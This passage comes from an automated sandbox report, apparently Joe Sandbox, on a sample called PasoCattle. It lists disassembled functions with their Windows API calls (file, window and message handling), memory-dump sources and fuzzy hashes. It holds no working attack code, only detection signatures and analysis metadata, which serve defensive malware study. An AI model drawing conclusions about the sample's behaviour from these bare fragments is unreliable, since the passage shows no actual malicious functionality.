                                                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                        APIs
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                        • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                        • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                        • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                        • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                        APIs
                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                        • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                        • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                        • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                        • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                        • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                        • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                        • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                        • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                        • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                        • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                        • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                        • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                        • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                        • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                        • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                        • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                        • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                        • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                        • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                        • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                        • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                        • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                        • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                        • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                        • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                        APIs
                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                        • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                        • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                        • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
